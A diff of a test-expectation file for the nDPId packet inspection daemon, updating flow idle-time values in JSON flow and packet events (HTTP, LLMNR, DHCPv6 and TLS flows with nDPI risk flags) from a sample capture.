+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416855,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2UAAAERi4vAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
@@ -472,10 +472,10 @@ 00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1470104416958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416958,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2cAAAERi4nAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1470104416959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416959,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxIAAAERB\/fAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"} 
-02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7i
jEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"} 
+02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7i
jEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1470104420438,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"thread_ts_msec":1470104420438,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"} 00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
@@ -488,18 +488,18 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1470104423202,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104423202,"pkt":"MzMAAQAC9FyJieYHht1gD8\/5ACwRAf6AAAAAAAAA9lyJ\/\/6J5gf\/AgAAAAAAAAAAAAAAAQACAiICIwAsGIELuXYqAAEADgABAAEeo3uS9FyJieYHAAYABAAXABgACAAC\/\/8="} 00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 